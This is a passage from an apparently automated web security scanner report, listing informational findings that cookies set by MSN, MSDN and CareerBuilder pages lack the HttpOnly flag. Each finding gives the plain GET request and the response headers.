User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
Set-Cookie: MC1=V=3&GUID=78fc912bcfc74a00b174e74deda213d4; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
S: CO1MPPRENM08
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sat, 29 Jan 2011 23:47:57 GMT
Content-Length: 60626

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" dir="ltr" xmlns="http://www.w3.org/1999/xhtml"><head><l
...[SNIP]...

17.312. http://money.redacted/saving-money/50-30-20-budget.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://money.redacted
Path:   /saving-money/50-30-20-budget.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /saving-money/50-30-20-budget.aspx HTTP/1.1
Host: money.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
Set-Cookie: MC1=V=3&GUID=4d2c950ddf854b40a5add97ca57f1813; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
S: CO1MPPRENM07
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sat, 29 Jan 2011 23:48:06 GMT
Content-Length: 33106

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" dir="ltr" xmlns="http://www.w3.org/1999/xhtml"><head><l
...[SNIP]...

17.313. http://redacted/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://moneycentral.msn.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Object moved
Connection: close
Date: Sat, 29 Jan 2011 23:48:16 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
pragma: no-cache
Location: http://moneycentral.msn.com/home.asp
Content-Length: 157
Content-Type: text/html
Set-Cookie: MUID=74239CED20224902AC862552C566F9F3; expires=Sun, 01-Nov-2020 07:00:00 GMT; domain=.redacted; path=/
Cache-control: private

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="http://moneycentral.redacted/home.asp">here</a>.</body>

17.314. http://redacted/detail/stock_quote

Summary

Severity:   Information
Confidence:   Certain
Host:   http://moneycentral.msn.com
Path:   /detail/stock_quote

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /detail/stock_quote HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Connection: close
Date: Sat, 29 Jan 2011 23:48:21 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: http://investing.money.redacted/investments/stock-price
Set-Cookie: MUID=f1e153930f7d43c7a9fd16af4cdded3a; domain=.redacted; expires=Tue, 29-Jan-2013 23:48:21 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 171

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://investing.money.redacted/investments/stock-price">here</a>.</h2>
</body></html>

17.315. http://redacted/inc/Attributions.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://moneycentral.msn.com
Path:   /inc/Attributions.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /inc/Attributions.asp HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 29 Jan 2011 23:48:25 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
cache-control: private
pragma: no-cache
Content-Length: 26240
Content-Type: text/html
Expires: Sat, 29 Jan 2011 23:48:25 GMT
Set-Cookie: MUID=BBC5C4C59F664372B83E2469BBE8E1C0; expires=Sun, 01-Nov-2020 07:00:00 GMT; domain=.redacted; path=/
Cache-control: private


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<head>
<tit
...[SNIP]...

17.316. http://redacted/personal-finance/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://moneycentral.msn.com
Path:   /personal-finance/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /personal-finance/ HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Connection: close
Date: Sat, 29 Jan 2011 23:48:20 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: http://money.redacted/personal-finance/
Set-Cookie: MUID=eeb0f31a74744b6db817f50168fe01ae; domain=.redacted; expires=Tue, 29-Jan-2013 23:48:20 GMT; path=/
Cache-Control: private
Content-Length: 0


17.317. http://movies.redacted/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://movies.redacted
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: movies.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 88675
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: stad=; path=/
Set-Cookie: MC1=V=3&GUID=8a183991ad5843ecb33290e9ed7a7542; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:48:26 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   MSN Movies
...[SNIP]...

17.318. http://movies.redacted/academy-awards/snubs/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://movies.redacted
Path:   /academy-awards/snubs/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /academy-awards/snubs/ HTTP/1.1
Host: movies.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 43284
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: stad=; path=/
Set-Cookie: MC1=V=3&GUID=315a7361d2a9433cbd6de273a6f46301; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:48:36 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   2011 Acade
...[SNIP]...

17.319. http://movies.redacted/jason-statham/photo-gallery/feature/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://movies.redacted
Path:   /jason-statham/photo-gallery/feature/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /jason-statham/photo-gallery/feature/ HTTP/1.1
Host: movies.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 38350
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: stad=; path=/
Set-Cookie: MC1=V=3&GUID=bd071d931c99456bbb919ea6d508c2bf; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:48:32 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   A Beginner
...[SNIP]...

17.320. http://movies.redacted/mom-pop-culture/tiger-mom-movie/story-feature/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://movies.redacted
Path:   /mom-pop-culture/tiger-mom-movie/story-feature/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mom-pop-culture/tiger-mom-movie/story-feature/ HTTP/1.1
Host: movies.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 48526
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: stad=; path=/
Set-Cookie: MC1=V=3&GUID=edacaf4cfdd14387b49aebcecaca1296; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:48:26 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   Mom &amp;
...[SNIP]...

17.321. http://movies.redacted/new-on-dvd/movies/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://movies.redacted
Path:   /new-on-dvd/movies/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /new-on-dvd/movies/ HTTP/1.1
Host: movies.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 48135
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: stad=; path=/
Set-Cookie: MC1=V=3&GUID=644af2bf6b11442a9276943bf18262ae; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:48:26 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   Movies New
...[SNIP]...

17.322. http://movies.redacted/paralleluniverse/5-demonic-possession-movies/story/across-the-universe/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://movies.redacted
Path:   /paralleluniverse/5-demonic-possession-movies/story/across-the-universe/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /paralleluniverse/5-demonic-possession-movies/story/across-the-universe/ HTTP/1.1
Host: movies.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 49419
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: stad=; path=/
Set-Cookie: MC1=V=3&GUID=2f4ba9c5a4c34145987ce8f93d87a3b5; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:48:29 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   Parallel U
...[SNIP]...

17.323. http://movies.redacted/paralleluniverse/dissecting-dark-knight-villains/story/across-the-universe/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://movies.redacted
Path:   /paralleluniverse/dissecting-dark-knight-villains/story/across-the-universe/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /paralleluniverse/dissecting-dark-knight-villains/story/across-the-universe/ HTTP/1.1
Host: movies.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 52719
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: stad=; path=/
Set-Cookie: MC1=V=3&GUID=5ff4b00728d9439c8b366e737607dbdc; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:48:30 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   Parallel U
...[SNIP]...

17.324. http://movies.redacted/showtimes/showtimes.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://movies.redacted
Path:   /showtimes/showtimes.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /showtimes/showtimes.aspx HTTP/1.1
Host: movies.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 135
Content-Type: text/html; charset=utf-8
Expires: -1
Location: /showtimes/?
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: THTR=IPP=5; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: MC1=V=3&GUID=9fe02721dc3a4a9c834efd7852955ccc; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:48:40 GMT
Connection: close

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2fshowtimes%2f%3f">here</a>.</h2>
</body></html>

17.325. http://movies.redacted/the-rundown/the-guard/story_5/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://movies.redacted
Path:   /the-rundown/the-guard/story_5/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /the-rundown/the-guard/story_5/ HTTP/1.1
Host: movies.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 65403
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: stad=; path=/
Set-Cookie: MC1=V=3&GUID=423319e9829a41ada11054b6866c7b97; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:48:29 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   MSN Movies
...[SNIP]...

17.326. http://msdn.microsoft.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://msdn.microsoft.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Location: /en-us/
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: A=I&I=AxUFAAAAAAD6BwAA2FAL8QpHJ6ENcoug1+VHkA!!&M=1; domain=.microsoft.com; expires=Tue, 29-Jan-2041 23:23:48 GMT; path=/
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Set-Cookie: A=I&I=AxUFAAAAAAD6BwAA2FAL8QpHJ6ENcoug1+VHkA!!&M=1; domain=.microsoft.com; expires=Tue, 29-Jan-2041 23:23:48 GMT; path=/; path=/
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/; path=/
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:23:50 GMT
Content-Length: 124

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="/en-us/">here</a>.</h2>
</body></html>

17.327. http://msdn.microsoft.com/en-us/library/cc838158(VS.95

Summary

Severity:   Information
Confidence:   Certain
Host:   http://msdn.microsoft.com
Path:   /en-us/library/cc838158(VS.95

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /en-us/library/cc838158(VS.95 HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 13126
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: A=I&I=AxUFAAAAAAC+BgAA/LKUz1RDYrDrBIShzmD0CQ!!&M=1; domain=.microsoft.com; expires=Tue, 29-Jan-2041 23:26:20 GMT; path=/
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:26:20 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   
Content not fou
...[SNIP]...

17.328. http://msdn.microsoft.com/en-us/library/cc838158(VS.95).aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://msdn.microsoft.com
Path:   /en-us/library/cc838158(VS.95).aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /en-us/library/cc838158(VS.95).aspx HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 29998
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
Set-Cookie: A=I&I=AxUFAAAAAAAvCAAAAHhoQDRGOCpGUJGGvUjPzg!!&M=1; domain=.microsoft.com; expires=Tue, 29-Jan-2041 23:26:15 GMT; path=/
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: A=I&I=AxUFAAAAAAC5BwAAZhvvn/BBIrR1Pt6imQlAcw!!&M=1; domain=.microsoft.com; expires=Tue, 29-Jan-2041 23:26:15 GMT; path=/
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: TocHashCookie=ms310241(n)/aa139615(n)/cc838813(VS.95,n)/; expires=Tue, 29-Jan-2041 23:26:15 GMT; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Set-Cookie: A=I&I=AxUFAAAAAAC5BwAAZhvvn/BBIrR1Pt6imQlAcw!!&M=1; domain=.microsoft.com; expires=Tue, 29-Jan-2041 23:26:15 GMT; path=/; path=/
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/; path=/
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:26:14 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   
Silverlight

</
...[SNIP]...

17.329. http://msdn.microsoft.com/en-us/library/ff637515(VS.92

Summary

Severity:   Information
Confidence:   Certain
Host:   http://msdn.microsoft.com
Path:   /en-us/library/ff637515(VS.92

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /en-us/library/ff637515(VS.92 HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 14228
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: A=I&I=AxUFAAAAAACxBwAAsl7l0ihNIHEg4m248bhSNg!!&M=1; domain=.microsoft.com; expires=Tue, 29-Jan-2041 23:26:22 GMT; path=/
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:26:22 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   
Content not fou
...[SNIP]...

17.330. http://msdn.microsoft.com/en-us/library/ff637515(VS.92).aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://msdn.microsoft.com
Path:   /en-us/library/ff637515(VS.92).aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /en-us/library/ff637515(VS.92).aspx HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 21669
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
Set-Cookie: A=I&I=AxUFAAAAAACeBwAAfX4UyXJKIqHwEP+0sulhJA!!&M=1; domain=.microsoft.com; expires=Tue, 29-Jan-2041 23:26:22 GMT; path=/
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: A=I&I=AxUFAAAAAACPCQAACkbcHwtHFnbPetyIMGIFSQ!!&M=1; domain=.microsoft.com; expires=Tue, 29-Jan-2041 23:26:22 GMT; path=/
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: TocHashCookie=ms310241(n)/aa187916(n)/ff403849(VS.92,n)/na/; expires=Tue, 29-Jan-2041 23:26:22 GMT; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Set-Cookie: A=I&I=AxUFAAAAAACPCQAACkbcHwtHFnbPetyIMGIFSQ!!&M=1; domain=.microsoft.com; expires=Tue, 29-Jan-2041 23:26:22 GMT; path=/; path=/
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/; path=/
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:26:21 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   
Design Resource
...[SNIP]...

17.331. http://msn.careerbuilder.com/jobseeker/jobs/jobResults.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://msn.careerbuilder.com
Path:   /jobseeker/jobs/jobResults.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /jobseeker/jobs/jobResults.aspx HTTP/1.1
Host: msn.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 186049
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
